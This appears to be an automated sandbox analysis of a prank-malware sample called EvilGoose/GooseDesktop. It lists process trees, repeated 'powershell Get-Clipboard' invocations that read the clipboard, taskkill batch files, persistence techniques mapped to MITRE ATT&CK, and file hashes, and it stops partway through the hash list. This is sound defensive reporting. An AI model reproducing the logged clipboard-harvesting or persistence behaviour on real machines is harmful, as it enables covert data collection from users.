  C:\Windows\system32\cmd.exe (PID 740)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4316)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4636)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1420)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1344)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4880)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4116)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 388)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1004)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2300)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2700)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 740)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4640)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 3608)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4836)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2940)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2988)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3560)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 956)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1284)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2332)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3100)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2952)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 3412)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2568)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1676)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 4788)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2684)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4144)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 1344)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5100)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4928)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 1380)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3020)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4368)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2868)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 432)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 3792)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3584)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4276)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4360)
      cmdline: powershell Get-Clipboard
C:\Windows\system32\AUDIODG.EXE (PID 1932)
  cmdline: C:\Windows\system32\AUDIODG.EXE 0x508 0x51c

C:\Windows\system32\werfault.exe (PID 396)
  cmdline: werfault.exe /h /shared Global\5d3f71723c5e464aa1a06259e50323c0 /t 1440 /p 1804

C:\Windows\system32\BackgroundTaskHost.exe (PID 2700)
  cmdline: "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\system32\DllHost.exe (PID 4400)
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\DllHost.exe (PID 1824)
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskmgr.exe (PID 3232)
  cmdline: "C:\Windows\system32\taskmgr.exe" /7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3660)
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault52e6eeach2d99h4d8dh8d4fh8968a3b876e1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4440)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4784)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1320)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2748)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe (PID 4628)
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 1420)
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe (PID 1316)
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4268)
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault38459c21h7750h4fc5hb430h1194dc23eeba
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4772)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3212)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1176)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4168)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe (PID 4492)
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 3316)
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe (PID 4200)
  cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe (PID 4400)
  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "

C:\Windows\system32\cmd.exe (PID 2104)
  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "

C:\Windows\system32\mspaint.exe (PID 2560)
  cmdline: "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\ShowFormat.jpg" /ForceBootstrapPaint3D
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\svchost.exe (PID 3376)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
  - Drops file in System32 directory

C:\Windows\system32\OpenWith.exe (PID 1292)
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\mspaint.exe
  cmdline: "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\My Wallpaper.jpg" /ForceBootstrapPaint3D
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
PID:3760
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1344
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:1012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "1⤵PID:3628
-
C:\Windows\system32\taskkill.exetaskkill /f /im goosedesktop.exe2⤵
- Kills process with taskkill
PID:1344
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\main.ps1"1⤵
- Opens file in notepad (likely ransom note)
PID:4968
-
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3792
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "1⤵PID:3316
-
C:\Windows\system32\taskkill.exetaskkill /f /im goosedesktop.exe2⤵
- Kills process with taskkill
PID:4332
-
Network

MITRE ATT&CK Enterprise v15

Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)

Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Downloads

Filesize: 78KB
MD5: 2cfd3dd20571cce21f09407b28b565fb
SHA1: 07a7704986e963e9ba69f7109b7450deccd23eb2
SHA256: c9eb076f465aac3c93c61f34fb7cfef6677bacbab7e0611c1c41b80b7f057792
SHA512: bec2ec4d1562c45aaa276e1687786ccd494afefe93dfa330c600e2ad8ac6783ea7988c284df42c5c811afc5d73686484012584faf553e9777f4cb0b7ad436e7d

Filesize: 33KB
MD5: c555604e8b6f818991e186342f856b1b
SHA1: 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256: 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA512: 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

Filesize: 1KB
MD5: f0f11cd478cc44d518c16820ede9d253
SHA1: cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256: 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512: ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

Filesize: 2KB
MD5: 6cf293cb4d80be23433eecf74ddb5503
SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Filesize: 152B
MD5: 8b167567021ccb1a9fdf073fa9112ef0
SHA1: 3baf293fbfaa7c1e7cdacb5f2975737f4ef69898
SHA256: 26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
SHA512: 726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54

Filesize: 152B
MD5: 537815e7cc5c694912ac0308147852e4
SHA1: 2ccdd9d9dc637db5462fe8119c0df261146c363c
SHA256: b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
SHA512: 63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a

Filesize: 5KB
MD5: 83bd19b5f527faa0db7a98fe3e75fd40
SHA1: 2b62e33b56390dbb5846f6ef4a658e9cbf07b857
SHA256: e757b14ab35263d70a1648db65414a00af3937e4d103373c3cd06d83a3fe197c
SHA512: c2dee11a50fe2017ad48925dc9ec2d7c0d3412a746313583f43c522d4d7077e3a091a4e032816e992640e81f48b4583cd0c82320fb8a6593ab024edc647a8c33

Filesize: 264KB
MD5: f50f89a0a91564d0b8a211f8921aa7de
SHA1: 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512: bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Filesize: 8KB
MD5: 0082c8bfdbaa02538ade9f6f6b3ad91a
SHA1: fc1638ad73c01f106e0de926f38d982475c30329
SHA256: 7c0f1ab3735a5bce58635317157a00730c7e6fde1d0111344783bb489b040982
SHA512: b813ec1268f1583fb4b9c0daf3a0a131160153c354b416874bf57a22ce2ab3c8a8103f98d062e936f6615196e815f2e58b8dd5804b76612c01f2fdd99e50e14c

Filesize: 64B
MD5: 446dd1cf97eaba21cf14d03aebc79f27
SHA1: 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256: a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512: a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Filesize: 1KB
MD5: 8d460ce715a00afd56cda62e926b8b17
SHA1: 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256: 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA512: 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

Filesize: 944B
MD5: d28a889fd956d5cb3accfbaf1143eb6f
SHA1: 157ba54b365341f8ff06707d996b3635da8446f7
SHA256: 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512: 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Filesize: 64B
MD5: 5ad057f22389d36eb38a18d31efe295b
SHA1: e8668017f1339dc8496c087295f79516dce8e9bf
SHA256: 205049c83211067b8e11e2fe83e6224dc966c33fee28fc4643efa55d069b41f3
SHA512: 3169c4d8d2e695debce2f47a0285c9b9b11913392f7ab9911f9530bf13ba94531bb2713becce0d616872263d6fab8097848f28894bf1594ec1e81aa20049cd2a

Filesize: 944B
MD5: 96ff1ee586a153b4e7ce8661cabc0442
SHA1: 140d4ff1840cb40601489f3826954386af612136
SHA256: 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512: 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Filesize: 64B
MD5: 5c10ece9e67c1d50ee9b458aa8cc169a
SHA1: 45fce8c44fd825126ba098ff354a53474a17f9f0
SHA256: 71ca49efcebb0543a909d0239c210d1e4480f244e5be344f0d511b2c1ef430b0
SHA512: 79392ee8c5c61eecde85ee2dc3baacfc351b569f1e96d81493d5ba82c70032efd75143565e4f121ec971e295c822ed5e25a18fa61c1378f53b1f96c42f86fa45

Filesize: 64B
MD5: feadc4e1a70c13480ef147aca0c47bc0
SHA1: d7a5084c93842a290b24dacec0cd3904c2266819
SHA256: 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512: c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Filesize: 1KB
MD5: 29fd7ba4c4365599ebc5c52cd71c171c
SHA1: 6d7413709b5532115a116b1f0e7f4b791e2d4ab0
SHA256: 8607711dbf3a10f36f5a05c8ef53d6aeb1c0683420fc6ad5b2990fc043909850
SHA512: 884d9e7817638f28cfbb8a9cd7ffb5252b94197206fca94f89bb3042127d1e22c5d52a97d6df8d4b16dbacdb20029a025fdd1c60f180e59ca6a3453a5bbf6987

Filesize: 64B
MD5: b16dc67d8633fb86f9d9dc491097150e
SHA1: 0ea564df2675c5e2a82449530dd070ad855dfcd6
SHA256: 378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b
SHA512: c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd

Filesize: 1.4MB
MD5: 56192831a7f808874207ba593f464415
SHA1: e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256: 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512: c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Filesize: 398KB
MD5: eac919eb1e9ebdac0c2529ef769736ce
SHA1: 24de10fc0763417aed6b020a1ff226a656339028
SHA256: 9ab12e452de8f41040b914d7791e533d0847d09e6be90065a784b907181057db
SHA512: b2bf74a79f800a1ae70fadc7badcbc42dcd776a6da8193789b5cdb236ee96e8e0a06b582d271fc0b98c51353c5ee8ceb7d03640bba7201f5c071313798424718

Filesize: 6.3MB
MD5: ecd3eedd1f783552e35f5bec18887ff7
SHA1: ab75a39baf2311570db5a4d90566a8746fdecc01
SHA256: 652b3eb51dfc7cdd774b5c1103d69ae6c820190159d64cb477a4836096a639d7
SHA512: 14351e2f978f762982fd91f9e9ce6164f02e445b9de839ed603df67f0502863d6d34551401b675bd486d568adf509543fa55ac15eb7a1d77c2fd88ced109f994

Filesize: 4KB
MD5: 5436e6aebabf071c1d832071a01b8bcd
SHA1: c7b19e1afcaaea7cc2db55d4ef74f25c0f3603e2
SHA256: 2bf822b86e4adabce83a796de15fbbfeb75ff82c3bc1ed2a0f5286962915d362
SHA512: dd1851bb2d6ea5217f59974270ed59b0d7c758c862a333dcf455d43e03ba4c4484a86596c4a7b1ed46c3c671da5ede356ff5c4f7f9d93746d119f4d4332fd204

Filesize: 5KB
MD5: db2b7cf36003b2b653df6f3ca986e007
SHA1: d61a94c7b965dec3daa6351d849fa22f646edf8b
SHA256: 56a240ddfbb494a6cb5c02a1271b5cc9a79217c53b481d9d3240b4973808d65b
SHA512: 3c5ba0484567bd520334837c54df160b26d3a3be952474aedf23a946369bada58241dc43a471d8e9e652e0b682599f1c5dbd03e39fe8c1f6182b806b6939eef3

Filesize: 11KB
MD5: 3b86bf25cd702a3a071590f088fabf64
SHA1: 31b279bca59916ba8202b029e7b7b808981a52be
SHA256: 7c8864e0b63969e2469c2d80cd855648044cd15fd89dbabd275954efb7ef6879
SHA512: b63b24259b6a2acb01f7d066fa10c5ddf4237b0deebab4e4389a40ee677ffb232baa0f3029f47e388eb1f6fbcf97f4a640e41b594ce9f0c41a841b97e471e214

Filesize: 5KB
MD5: bcd1908ce864cb01a222b5cc791d7758
SHA1: fd1f938c0497cf8cf81832843a58db3ae13eb4d9
SHA256: e4b86c31838511199dac9eb6e0507736ee461b0edaa4bf9351142c534f2c2e8e
SHA512: 8e883b8d54f9461d1f9dfae64cab391c17b405b6ce351648aa420f0a589def8a4f6d135f3bfb12158aa66df67d4d7b056f0ff3d80c052bf8dc0e1b31a670f759

Filesize: 13KB
MD5: b2354d238829d09c54e272d8b4f60189
SHA1: 5a2731c04c50903d41f65d9fe5528a66cbefa289
SHA256: d5281ba99731fe3c443b6b2d18960a49e74b5b407956d3e1a3cde360f86573ba
SHA512: aafbc687b5eac32fe1b4d838ab1ac88103d7f59d0b5f51519845abdd9ae37147e73143e6039719c3d06915107397e3e0a666d0cb1677cdbe05bccebea69ecaf9

Filesize: 221KB
MD5: c883e2c769ebe56240a71260b17f1b93
SHA1: 4a831d4f48f6ea81db508c2a87cf860acd17edb1
SHA256: 943fd1ea44266c5d7fa02f2b292db095a4e6ba8027a1f6c73fd60d1165e63aff
SHA512: dae40d442794152285ce484b10095d11592a39cb1968bd38cc70ee23005bd1e04ad4312d7266107bdd375e10fa91ab9fd3d41d4d6ccd2268d052b343528c4376

Filesize: 16KB
MD5: 9eb11041f2f11d939074e26b4b554088
SHA1: 50deec7591fcc5db40939543fc9bf92109f2df05
SHA256: efa31df7ab1394092395365805f913dd023cdcd21796603f133641524fb9ad79
SHA512: 2d07f40f56ae0dcaba51bc65e4617a0bfd67be13be5156fd7c2850645a461f87b97e46b2c596c21752df2aa488f6e6c329534a523bd7f88234be956b8af13bd1

Filesize: 285B
MD5: 072813d2253b25cbcd5858226f5f17a0
SHA1: c114c97f887e56efc0941ad37ffb3f6730195eac
SHA256: cfeb29c3953c0a6ae97ab52d912311c94e0ab0df87c63ba32770ba4a714d0022
SHA512: a413ad200790b7a6f109213e73abf3eb20da0608b7b6826f5347e26b519c64581bebab3bf34c91c4aa7cc1181e73d8d824c1eec70aed07c222ef30bcc8779ee3

Filesize: 153KB
MD5: efe1f662b2b23a094b20f0a951c14b10
SHA1: 9f239fbdb6ec000710bf33923d29eddf65b357c7
SHA256: 04e3334cd62fc251145ac09a052b6a069634740c4b61825cce0f14a588542ec6
SHA512: 50c13ee918422fdc2e6e53e67f51a4b8eb22c84dda54f5afdcadd96e9ecf000097c6beb0778511a2e5ee93130694c4a66bc8a73db614c8b6faa1a70243e9ab07

Filesize: 125KB
MD5: ba973fe2fa62e2bfa81c30cb0d77b2c2
SHA1: 69fed56755ea90b354ae637e88b04f9568c2a8cb
SHA256: 9e39235c5b07ca875e8e139ca6b29fc97205875df5c009c3854f64a5cdeef778
SHA512: 867067ae3b58d10a914aefb8b9a3f9550b20f724ad6f5011d391f83f153fb9f3418ef27bc78008146b9b04657e72ebd827799fa3aff247a61b5986e83593c0cf

Filesize: 431KB
MD5: 564384e5f6ba350c67eff92279bb1b6d
SHA1: d5a0926a7024339062efce2956a841eea4592282
SHA256: 199ecf0ae1381d1bb71d53ce5d80b74c4fd525f7efd9d1e19267f2b1f7fd5f67
SHA512: 7c50d73f1004541cd64c1c40c7b5dcd65887c74cb347d2fd03cc2b519c324f0fb2116322085096628ba9fc12a68ecec2b343f0bbd320ba253b9f94c1800eaf71

Filesize: 2KB
MD5: 78e6f792c7ee52c112ea84a3deef6d8a
SHA1: b5a77c2816161059c2dd40c81ba89ed8de385f27
SHA256: 31168dff50aa6099e3ad4b4104e5d6d3ec03f94e21575d525e07f7bbbb7159f0
SHA512: 3f7ed6950894cc9436d6e5e25d569de60a4667a510b95b4201fe7675ef18e26ab59cfa552a4b97b392828c864e315510e95fe5bad4a4c7cb438665d84be9aa74

Filesize: 431KB
MD5: 2e264d2ae4ddecac3b87091292ad7484
SHA1: 20230e7a18394d561535a211d6d27c709bffdfde
SHA256: 3d28f0e3aacfb9df81837570e49271ccb737105fe32219241796c4e21470c20b
SHA512: be32d99f09daefefd3a179203d4a1e4c5ddefd4e3395f2a492ba56b909b495ef6f92284dac722f5dc9befa58d6b593d2044bdbb63d838cfafe49a7e19fdbf9d0

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 728B
MD5: ede83963d9c708680b7e6a6a97115b46
SHA1: c02bcfd669e4f75f4a381d784b11f0639afc39c3
SHA256: 516870000b15440f653de5ba4c2c8cc8e9ab44d96371ea2cb29a240c473954d3
